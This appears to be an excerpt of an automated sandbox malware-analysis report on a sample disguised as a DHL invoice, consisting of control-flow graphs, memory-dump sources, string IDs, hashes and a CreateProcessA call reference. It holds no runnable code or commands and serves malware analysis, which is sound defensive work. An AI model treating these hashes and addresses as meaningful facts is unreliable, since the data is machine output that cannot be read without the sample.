                                                                                                                control_flow_graph 1896 5c26cf9-5c26d34 1898 5c26d36 1896->1898 1899 5c26d3d-5c26d50 call 5c26988 1896->1899 1898->1899 1902 5c26d56-5c26d69 1899->1902 1903 5c26e94-5c26e9b 1899->1903 1909 5c26d77-5c26d91 1902->1909 1910 5c26d6b-5c26d72 1902->1910 1904 5c26ea1-5c26eb6 1903->1904 1905 5c27135-5c2713c 1903->1905 1916 5c26ed6-5c26edc 1904->1916 1917 5c26eb8-5c26eba 1904->1917 1907 5c271ab-5c271b2 1905->1907 1908 5c2713e-5c27147 1905->1908 1912 5c271b8-5c271c1 1907->1912 1913 5c2724e-5c27255 1907->1913 1908->1907 1914 5c27149-5c2715c 1908->1914 1931 5c26d93-5c26d96 1909->1931 1932 5c26d98-5c26da5 1909->1932 1915 5c26e8d 1910->1915 1912->1913 1918 5c271c7-5c271da 1912->1918 1919 5c27271-5c27277 1913->1919 1920 5c27257-5c27268 1913->1920 1914->1907 1936 5c2715e-5c271a3 call 5c23ed0 1914->1936 1915->1903 1925 5c26ee2-5c26ee4 1916->1925 1926 5c26fa4-5c26fa8 1916->1926 1917->1916 1924 5c26ebc-5c26ed3 1917->1924 1940 5c271dc-5c271eb 1918->1940 1941 5c271ed-5c271f1 1918->1941 1921 5c27289-5c27292 1919->1921 1922 5c27279-5c2727f 1919->1922 1920->1919 1942 5c2726a 1920->1942 1928 5c27281-5c27287 1922->1928 1929 5c27295-5c2730a 1922->1929 1924->1916 1925->1926 1935 5c26eea-5c26f04 1925->1935 1926->1905 1930 5c26fae-5c26fb0 1926->1930 1928->1921 1928->1929 2012 5c27318 1929->2012 2013 5c2730c-5c27316 1929->2013 1930->1905 1937 5c26fb6-5c26fbf 1930->1937 1938 5c26da7-5c26dbb 1931->1938 1932->1938 2050 5c26f06 call 5c274c8 1935->2050 2051 5c26f06 call 5c274b8 1935->2051 1936->1907 1973 5c271a5-5c271a8 1936->1973 1948 5c27112-5c27118 1937->1948 1938->1915 1966 5c26dc1-5c26e15 1938->1966 1940->1941 1943 5c271f3-5c271f5 1941->1943 1944 5c27211-5c27213 1941->1944 1942->1919 1943->1944 1950 5c271f7-5c2720e 1943->1950 1944->1913 1951 5c27215-5c2721b 1944->1951 1952 5c2711a-5c27129 1948->1952 1953 5c2712b 1948->1953 1950->1944 1951->1913 1958 5c2721d-5c2724b 1951->1958 1960 5c2712d-5c2712f 1952->1960 1953->1960 1956 5c26f0c-5c26f6b call 5c23ed0 * 4 2002 5c26f82-5c26fa1 call 5c23ed0 1956->2002 2003 5c26f6d-5c26f7f call 5c23ed0 1956->2003 1958->1913 1960->1905 1965 5c26fc4-5c26fd2 call 5c256a0 1960->1965 1979 5c26fd4-5c26fda 1965->1979 1980 5c26fea-5c27004 1965->1980 2014 5c26e23-5c26e27 1966->2014 2015 5c26e17-5c26e19 1966->2015 1973->1907 1981 5c26fde-5c26fe0 1979->1981 1982 5c26fdc 1979->1982 1980->1948 1988 5c2700a-5c2700e 1980->1988 1981->1980 1982->1980 1990 5c27010-5c27019 1988->1990 1991 5c2702f 1988->1991 1994 5c27020-5c27023 1990->1994 1995 5c2701b-5c2701e 1990->1995 1997 5c27032-5c2704c 1991->1997 2000 5c2702d 1994->2000 1995->2000 1997->1948 2016 5c27052-5c270d3 call 5c23ed0 * 4 1997->2016 2000->1997 2002->1926 2003->2002 2017 5c2731d-5c2731f 2012->2017 2013->2017 2014->1915 2018 5c26e29-5c26e41 2014->2018 2015->2014 2044 5c270d5-5c270e7 call 5c23ed0 2016->2044 2045 5c270ea-5c27110 call 5c23ed0 2016->2045 2019 5c27321-5c27324 2017->2019 2020 5c27326-5c2732b 2017->2020 2018->1915 2024 5c26e43-5c26e4f 2018->2024 2023 5c27331-5c2735e 2019->2023 2020->2023 2025 5c26e51-5c26e54 2024->2025 2026 5c26e5e-5c26e64 2024->2026 2025->2026 2029 5c26e66-5c26e69 2026->2029 2030 5c26e6c-5c26e75 2026->2030 2029->2030 2032 5c26e77-5c26e7a 2030->2032 2033 5c26e84-5c26e8a 2030->2033 2032->2033 2033->1915 2044->2045 2045->1905 2045->1948 2050->1956 2051->1956
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: d6014185cb84d0583062cbb1a1f9c3af295cdbcf520ec7943c612a1e91e6bd85
                                                                                                                • Instruction ID: f21fa1130b81b6f1b5ce07c86d6940d7d89ab35c403891521f8caee0b8737711
                                                                                                                • Opcode Fuzzy Hash: d6014185cb84d0583062cbb1a1f9c3af295cdbcf520ec7943c612a1e91e6bd85
                                                                                                                • Instruction Fuzzy Hash: A2124D34A002298FDF15DFA5D894AAEBBF6FF48700F144855E812A7395DB34AE46CF60

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2052 53c29d0-53c29f8 2053 53c29ff-53c2a28 2052->2053 2054 53c29fa 2052->2054 2055 53c2a49 2053->2055 2056 53c2a2a-53c2a33 2053->2056 2054->2053 2057 53c2a4c-53c2a50 2055->2057 2058 53c2a3a-53c2a3d 2056->2058 2059 53c2a35-53c2a38 2056->2059 2061 53c2e07-53c2e1e 2057->2061 2060 53c2a47 2058->2060 2059->2060 2060->2057 2064 53c2e24-53c2e28 2061->2064 2065 53c2a55-53c2a59 2061->2065 2066 53c2e5d-53c2e61 2064->2066 2067 53c2e2a-53c2e5a 2064->2067 2068 53c2a5e-53c2a62 2065->2068 2069 53c2a5b-53c2ab8 2065->2069 2073 53c2e82 2066->2073 2074 53c2e63-53c2e6c 2066->2074 2067->2066 2071 53c2a8b-53c2aaf 2068->2071 2072 53c2a64-53c2a71 2068->2072 2075 53c2abd-53c2ac1 2069->2075 2076 53c2aba-53c2b2b 2069->2076 2071->2061 2094 53c2a7a-53c2a88 2072->2094 2077 53c2e85-53c2e8b 2073->2077 2079 53c2e6e-53c2e71 2074->2079 2080 53c2e73-53c2e76 2074->2080 2082 53c2aea-53c2b11 2075->2082 2083 53c2ac3-53c2ae7 2075->2083 2087 53c2b2d-53c2b8a 2076->2087 2088 53c2b30-53c2b34 2076->2088 2085 53c2e80 2079->2085 2080->2085 2110 53c2b21-53c2b22 2082->2110 2111 53c2b13-53c2b19 2082->2111 2083->2082 2085->2077 2097 53c2b8c-53c2be8 2087->2097 2098 53c2b8f-53c2b93 2087->2098 2091 53c2b5d-53c2b81 2088->2091 2092 53c2b36-53c2b5a 2088->2092 2091->2061 2092->2091 2094->2071 2108 53c2bed-53c2bf1 2097->2108 2109 53c2bea-53c2c4c 2097->2109 2101 53c2bbc-53c2bdf 2098->2101 2102 53c2b95-53c2bb9 2098->2102 2101->2061 2102->2101 2113 53c2c1a-53c2c32 2108->2113 2114 53c2bf3-53c2c17 2108->2114 2120 53c2c4e-53c2cb0 2109->2120 2121 53c2c51-53c2c55 2109->2121 2110->2061 2111->2110 2132 53c2c34-53c2c3a 2113->2132 2133 53c2c42-53c2c43 2113->2133 2114->2113 2130 53c2cb5-53c2cb9 2120->2130 2131 53c2cb2-53c2d14 2120->2131 2123 53c2c7e-53c2c96 2121->2123 2124 53c2c57-53c2c7b 2121->2124 2143 53c2c98-53c2c9e 2123->2143 2144 53c2ca6-53c2ca7 2123->2144 2124->2123 2135 53c2cbb-53c2cdf 2130->2135 2136 53c2ce2-53c2cfa 2130->2136 2141 53c2d19-53c2d1d 2131->2141 2142 53c2d16-53c2d78 2131->2142 2132->2133 2133->2061 2135->2136 2154 53c2cfc-53c2d02 2136->2154 2155 53c2d0a-53c2d0b 2136->2155 2146 53c2d1f-53c2d43 2141->2146 2147 53c2d46-53c2d5e 2141->2147 2152 53c2d7d-53c2d81 2142->2152 2153 53c2d7a-53c2dd3 2142->2153 2143->2144 2144->2061 2146->2147 2163 53c2d6e-53c2d6f 2147->2163 2164 53c2d60-53c2d66 2147->2164 2157 53c2daa-53c2dcd 2152->2157 2158 53c2d83-53c2da7 2152->2158 2165 53c2dfc-53c2dff 2153->2165 2166 53c2dd5-53c2df9 2153->2166 2154->2155 2155->2061 2157->2061 2158->2157 2163->2061 2164->2163 2165->2061 2166->2165
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                • API String ID: 0-2697143702
                                                                                                                • Opcode ID: 7b44e1e9b99b2b374eae6aaea2e9de4d5cdca3e30eb8fd60aa1bdd0fdb8d5ae4
                                                                                                                • Instruction ID: 44bb3affc58163f232ebd1263fbb80a9686c4dbf8497faa8a85610b46ddaaf42
                                                                                                                • Opcode Fuzzy Hash: 7b44e1e9b99b2b374eae6aaea2e9de4d5cdca3e30eb8fd60aa1bdd0fdb8d5ae4
                                                                                                                • Instruction Fuzzy Hash: 43F19F38E05208DFCB28DFA4E4986ADBFB6BF49315F208569E846A7354CB746D81DF40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2178 5c29e40-5c29e52 2179 5c29e54-5c29e75 2178->2179 2180 5c29e7c-5c29e80 2178->2180 2179->2180 2181 5c29e82-5c29e84 2180->2181 2182 5c29e8c-5c29e9b 2180->2182 2181->2182 2183 5c29ea7-5c29ed3 2182->2183 2184 5c29e9d 2182->2184 2188 5c2a100-5c2a110 2183->2188 2189 5c29ed9-5c29edf 2183->2189 2184->2183 2202 5c2a112-5c2a114 2188->2202 2203 5c2a0df-5c2a0ee 2188->2203 2191 5c29fb1-5c29fb5 2189->2191 2192 5c29ee5-5c29eeb 2189->2192 2194 5c29fb7-5c29fc0 2191->2194 2195 5c29fd8-5c29fe1 2191->2195 2192->2188 2193 5c29ef1-5c29efe 2192->2193 2197 5c29f90-5c29f99 2193->2197 2198 5c29f04-5c29f0d 2193->2198 2194->2188 2199 5c29fc6-5c29fd6 2194->2199 2200 5c29fe3-5c2a003 2195->2200 2201 5c2a006-5c2a009 2195->2201 2197->2188 2204 5c29f9f-5c29fab 2197->2204 2198->2188 2205 5c29f13-5c29f2b 2198->2205 2206 5c2a00c-5c2a012 2199->2206 2200->2201 2201->2206 2207 5c2a117-5c2a147 2202->2207 2208 5c2a0cb 2202->2208 2217 5c2a0f6-5c2a0fd 2203->2217 2204->2191 2204->2192 2209 5c29f37-5c29f49 2205->2209 2210 5c29f2d 2205->2210 2206->2188 2213 5c2a018-5c2a02b 2206->2213 2230 5c2a149 2207->2230 2231 5c2a15d-5c2a169 2207->2231 2216 5c2a0d5-5c2a0de 2208->2216 2209->2197 2222 5c29f4b-5c29f51 2209->2222 2210->2209 2213->2188 2215 5c2a031-5c2a041 2213->2215 2215->2188 2220 5c2a047-5c2a054 2215->2220 2216->2203 2220->2188 2224 5c2a05a-5c2a06f 2220->2224 2225 5c29f53 2222->2225 2226 5c29f5d-5c29f63 2222->2226 2224->2188 2232 5c2a075-5c2a098 2224->2232 2225->2226 2226->2188 2229 5c29f69-5c29f8d 2226->2229 2233 5c2a14c-5c2a14e 2230->2233 2234 5c2a175-5c2a191 2231->2234 2235 5c2a16b 2231->2235 2232->2188 2240 5c2a09a-5c2a0a5 2232->2240 2237 5c2a192-5c2a1bf call 5c256a0 2233->2237 2238 5c2a150-5c2a15b 2233->2238 2235->2234 2248 5c2a1c1-5c2a1c7 2237->2248 2249 5c2a1d7-5c2a1d9 2237->2249 2238->2231 2238->2233 2240->2217 2242 5c2a0a7-5c2a0b1 2240->2242 2242->2217 2250 5c2a0b3-5c2a0c9 2242->2250 2251 5c2a1cb-5c2a1cd 2248->2251 2252 5c2a1c9 2248->2252 2267 5c2a1db call 5c2a258 2249->2267 2268 5c2a1db call 5c2b3ff 2249->2268 2250->2208 2250->2216 2251->2249 2252->2249 2253 5c2a1e1-5c2a1e5 2255 5c2a230-5c2a240 2253->2255 2256 5c2a1e7-5c2a1fe 2253->2256 2256->2255 2260 5c2a200-5c2a20a 2256->2260 2262 5c2a20c-5c2a21b 2260->2262 2263 5c2a21d-5c2a22d 2260->2263 2262->2263 2267->2253 2268->2253
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq$d
                                                                                                                • API String ID: 0-3334038649
                                                                                                                • Opcode ID: becf525cbb72d8bc81d3ad775dc5b2165b2eef0876d23982ae8a2a2e59c883e5
                                                                                                                • Instruction ID: b8c87ea11acc233cadddcf53833a43079f4e7b20879ee40ab19b0499e2c97945
                                                                                                                • Opcode Fuzzy Hash: becf525cbb72d8bc81d3ad775dc5b2165b2eef0876d23982ae8a2a2e59c883e5
                                                                                                                • Instruction Fuzzy Hash: D9D16C35600616CFCB14CF29C88496AB7F2FF88310B55C969E85A9B365DB70FD41CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2269 53c26a8-53c26cd 2270 53c26cf 2269->2270 2271 53c26d4-53c26f1 2269->2271 2270->2271 2272 53c2712 2271->2272 2273 53c26f3-53c26fc 2271->2273 2276 53c2715-53c2719 2272->2276 2274 53c26fe-53c2701 2273->2274 2275 53c2703-53c2706 2273->2275 2277 53c2710 2274->2277 2275->2277 2278 53c2934-53c294b 2276->2278 2277->2276 2280 53c271e-53c2722 2278->2280 2281 53c2951-53c2955 2278->2281 2284 53c272a-53c272e 2280->2284 2285 53c2724-53c27c2 2280->2285 2282 53c297f-53c2983 2281->2282 2283 53c2957-53c297c 2281->2283 2289 53c29a4 2282->2289 2290 53c2985-53c298e 2282->2290 2283->2282 2287 53c2758-53c277d 2284->2287 2288 53c2730-53c2755 2284->2288 2294 53c27ca-53c27ce 2285->2294 2295 53c27c4-53c2862 2285->2295 2315 53c279e 2287->2315 2316 53c277f-53c2788 2287->2316 2288->2287 2293 53c29a7-53c29ad 2289->2293 2291 53c2995-53c2998 2290->2291 2292 53c2990-53c2993 2290->2292 2297 53c29a2 2291->2297 2292->2297 2300 53c27f8-53c281d 2294->2300 2301 53c27d0-53c27f5 2294->2301 2303 53c286a-53c286e 2295->2303 2304 53c2864-53c28ff 2295->2304 2297->2293 2328 53c283e 2300->2328 2329 53c281f-53c2828 2300->2329 2301->2300 2307 53c2898-53c28bd 2303->2307 2308 53c2870-53c2895 2303->2308 2313 53c2929-53c292c 2304->2313 2314 53c2901-53c2926 2304->2314 2342 53c28de 2307->2342 2343 53c28bf-53c28c8 2307->2343 2308->2307 2313->2278 2314->2313 2318 53c27a1-53c27a8 2315->2318 2324 53c278f-53c2792 2316->2324 2325 53c278a-53c278d 2316->2325 2326 53c27b8-53c27b9 2318->2326 2327 53c27aa-53c27b0 2318->2327 2331 53c279c 2324->2331 2325->2331 2326->2278 2327->2326 2336 53c2841-53c2848 2328->2336 2334 53c282f-53c2832 2329->2334 2335 53c282a-53c282d 2329->2335 2331->2318 2338 53c283c 2334->2338 2335->2338 2339 53c2858-53c2859 2336->2339 2340 53c284a-53c2850 2336->2340 2338->2336 2339->2278 2340->2339 2346 53c28e1-53c28e8 2342->2346 2344 53c28cf-53c28d2 2343->2344 2345 53c28ca-53c28cd 2343->2345 2349 53c28dc 2344->2349 2345->2349 2350 53c28f8-53c28f9 2346->2350 2351 53c28ea-53c28f0 2346->2351 2349->2346 2350->2278 2351->2350
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                • API String ID: 0-2697143702
                                                                                                                • Opcode ID: 73c744c3520bb9e0683a75e3756c04dad24089412f32e10ee1c00daa46e34952
                                                                                                                • Instruction ID: acca0ec1888d054dbcdcb576245fc159b4cf5f9986b4ef810a3074322884b464
                                                                                                                • Opcode Fuzzy Hash: 73c744c3520bb9e0683a75e3756c04dad24089412f32e10ee1c00daa46e34952
                                                                                                                • Instruction Fuzzy Hash: 5BA1F638E01209CFCB18DFA5D488AAEBBB6FF88301F508069E856A7354CB756D85DF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2352 a53991-a5399e 2354 a53b03-a53b1c 2352->2354 2356 a53a17-a53a30 2354->2356 2357 a53b22-a53b4b 2354->2357 2362 a53a32-a53a3e 2356->2362 2363 a53a5a 2356->2363 2360 a53b51-a53b5a 2357->2360 2361 a539a3-a539ac 2357->2361 2360->2361 2364 a539b5-a539b6 2361->2364 2365 a539ae 2361->2365 2367 a53a40-a53a46 2362->2367 2368 a53a48-a53a4e 2362->2368 2366 a53a60-a53a8f 2363->2366 2364->2354 2365->2354 2365->2356 2365->2364 2370 a53aa5-a53ab9 2365->2370 2371 a53bc4-a53be3 2365->2371 2372 a53d07-a53d23 2365->2372 2373 a53c28 2365->2373 2374 a53b76-a53bb9 2365->2374 2375 a53a11-a53a12 2365->2375 2376 a53b5f-a53b71 2365->2376 2377 a53abe-a53afe 2365->2377 2378 a53bbe-a53bbf 2365->2378 2379 a53d39-a53d4d 2365->2379 2380 a539bb-a539fe 2365->2380 2366->2361 2385 a53a95-a53aa0 2366->2385 2369 a53a58 2367->2369 2368->2369 2369->2366 2381 a53d4f-a53d8e 2370->2381 2371->2354 2391 a53be9-a53c12 2371->2391 2372->2376 2390 a53d29-a53d34 2372->2390 2384 a53c34-a53d02 2373->2384 2374->2361 2375->2354 2376->2361 2377->2361 2378->2354 2379->2381 2380->2373 2404 a53a04-a53a0f 2380->2404 2400 a53d90-a53d9b 2381->2400 2401 a53d9d-a53da6 2381->2401 2384->2361 2385->2361 2390->2361 2391->2361 2399 a53c18-a53c23 2391->2399 2399->2361 2400->2401 2405 a53daf-a53db0 2401->2405 2406 a53da8 2401->2406 2404->2361 2408 a53e41 2405->2408 2406->2405 2407 a53db5-a53dbc 2406->2407 2406->2408 2409 a53dfa-a53e2d 2406->2409 2407->2408 2411 a53dc2-a53deb 2407->2411 2409->2401 2418 a53e33-a53e3c 2409->2418 2411->2401 2415 a53ded-a53df8 2411->2415 2415->2401 2418->2401
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q$`Q^q
                                                                                                                • API String ID: 0-3163867966
                                                                                                                • Opcode ID: bc108453fbee944e42f1f6218277c6d4ad8092f91f14ac3788c71bb9945ffc9b
                                                                                                                • Instruction ID: 4fac919b58f0cf916fee35bb3c4563babfd0e7e965443ffaffdfe2e536c4579f
                                                                                                                • Opcode Fuzzy Hash: bc108453fbee944e42f1f6218277c6d4ad8092f91f14ac3788c71bb9945ffc9b
                                                                                                                • Instruction Fuzzy Hash: 89C1C2B5A15228CFDB24CF64D8587EDBBB1BB8A341F1041D9D90EA2651DBB40EC8DF42

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2423 5c28879-5c288a8 2425 5c28994-5c289b9 2423->2425 2426 5c288ae-5c288b2 2423->2426 2433 5c289c0-5c289e4 2425->2433 2427 5c288c6-5c288ca 2426->2427 2428 5c288b4-5c288c0 2426->2428 2429 5c288d0-5c288e7 2427->2429 2430 5c289eb-5c28a10 2427->2430 2428->2427 2428->2433 2441 5c288fb-5c288ff 2429->2441 2442 5c288e9-5c288f5 2429->2442 2451 5c28a17-5c28a6a 2430->2451 2433->2430 2443 5c28901-5c2891a 2441->2443 2444 5c2892b-5c28944 call 5c255d8 2441->2444 2442->2441 2442->2451 2443->2444 2456 5c2891c-5c2891f 2443->2456 2457 5c28946-5c2896a 2444->2457 2458 5c2896d-5c28991 2444->2458 2467 5c28aa2-5c28ac7 2451->2467 2468 5c28a6c-5c28a8c 2451->2468 2461 5c28928 2456->2461 2461->2444 2475 5c28ace-5c28b0e 2467->2475 2468->2475 2476 5c28a8e-5c28a9f 2468->2476
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq$(bq
                                                                                                                • API String ID: 0-4224401849
                                                                                                                • Opcode ID: 6b3e2cefc9a9ccf8c97b8de2442f4f84dea4c90c6efd12aea12358174d7125b5
                                                                                                                • Instruction ID: 35ecb653f6055be525d25923f09c99a9e42f02697c906d4c4575429a111967a5
                                                                                                                • Opcode Fuzzy Hash: 6b3e2cefc9a9ccf8c97b8de2442f4f84dea4c90c6efd12aea12358174d7125b5
                                                                                                                • Instruction Fuzzy Hash: 2E51CD327002548FCB15AF29D854AAE7BA6FF84311F208569E806CF3A5CF35ED46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq$Hbq
                                                                                                                • API String ID: 0-4081012451
                                                                                                                • Opcode ID: 18c6d212faf81c980eae8924b8975225eafef5d5bb1558e82d5bed5cbf81ff25
                                                                                                                • Instruction ID: 68126efa53bfa137fbaa5415a043447ec0bc2cba8dfc619340e4eca0708446d1
                                                                                                                • Opcode Fuzzy Hash: 18c6d212faf81c980eae8924b8975225eafef5d5bb1558e82d5bed5cbf81ff25
                                                                                                                • Instruction Fuzzy Hash: FA517A357006108FCB29AF79C85462E7BB6FF89301B60886CE5068B3A4DE35ED46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q$tocq
                                                                                                                • API String ID: 0-409840985
                                                                                                                • Opcode ID: c0b66997c588a3aab788f95120a48a3ee3baf16902b0197e1a56cc9af6176b7e
                                                                                                                • Instruction ID: bdd3f581e8e101440cd354a34e7ace44bc0fcd7b67fa15671e6c80dbe341655a
                                                                                                                • Opcode Fuzzy Hash: c0b66997c588a3aab788f95120a48a3ee3baf16902b0197e1a56cc9af6176b7e
                                                                                                                • Instruction Fuzzy Hash: FB313730B00214DFDB44EB68D568BADB7F2BF88701F248469E406EB3A5CB759C45DB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 11bd73ffd22ecda24cc03feb3667c53ca2908780b4158fa0c88f26811b473e63
                                                                                                                • Instruction ID: 3bbe024b10eabedb77e38f47e1617e07a0af5a4318aad2bfea626628bfdc617e
                                                                                                                • Opcode Fuzzy Hash: 11bd73ffd22ecda24cc03feb3667c53ca2908780b4158fa0c88f26811b473e63
                                                                                                                • Instruction Fuzzy Hash: BD118431604229DFDB24CE59D484FA9BBFAFF04364F14887AE401CB260D771DA80CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq
                                                                                                                • API String ID: 0-2474004448
                                                                                                                • Opcode ID: bcfd3270639a919e9789e4fa58a8970c7f742bda814e7998ffafc1c349268435
                                                                                                                • Instruction ID: 1509d9735deea73bf5696d5cbced935c07d454e1cbda06a13077e13797169537
                                                                                                                • Opcode Fuzzy Hash: bcfd3270639a919e9789e4fa58a8970c7f742bda814e7998ffafc1c349268435
                                                                                                                • Instruction Fuzzy Hash: 73521A75A002289FDB24CF69C981BEDBBF6BB88300F1585D9E509E7351DA309E81CF61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (_^q
                                                                                                                • API String ID: 0-538443824
                                                                                                                • Opcode ID: 12a19d008ec6f10ffbabef45fc5d3104f06a0d3a4e86ffc8dbd6727f0c03dc30
                                                                                                                • Instruction ID: 1c202575a2627ca42df055e90d522d473bf833f024b54f73bb522a6f982f11ab
                                                                                                                • Opcode Fuzzy Hash: 12a19d008ec6f10ffbabef45fc5d3104f06a0d3a4e86ffc8dbd6727f0c03dc30
                                                                                                                • Instruction Fuzzy Hash: B3224A35A002149FDB14DF69D495AADBBF2FF88310F148959E906EB3A1CB71ED81CB90
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0523F94A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 19ff15efe6b8f14f377060dba733d533445237f85bfd31654433a65a1e99bc6d
                                                                                                                • Instruction ID: 356fcfa3c293bc5c82d51d1eb67f86123c1767ada525293bcfce807f74b5e315
                                                                                                                • Opcode Fuzzy Hash: 19ff15efe6b8f14f377060dba733d533445237f85bfd31654433a65a1e99bc6d
                                                                                                                • Instruction Fuzzy Hash: C4816CB1D1021A9FDB14CFA9DA867EDBBF1BF48314F148129E859E7240E7789881CF81
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0523F94A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 8bef069305b2aa3407f0fa3bf105a0a3ff7bcf5f4422d5bbc3a09664d4df5781
                                                                                                                • Instruction ID: 2f3cf19e20cdbfbff14e04cf40cbb46bb2e06a08fca4970a309923aa47512304
                                                                                                                • Opcode Fuzzy Hash: 8bef069305b2aa3407f0fa3bf105a0a3ff7bcf5f4422d5bbc3a09664d4df5781
                                                                                                                • Instruction Fuzzy Hash: 668159B1D1021A9FDB14CFA9D9867EDBBF2BF48314F148129E859E7240E7789881CF81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
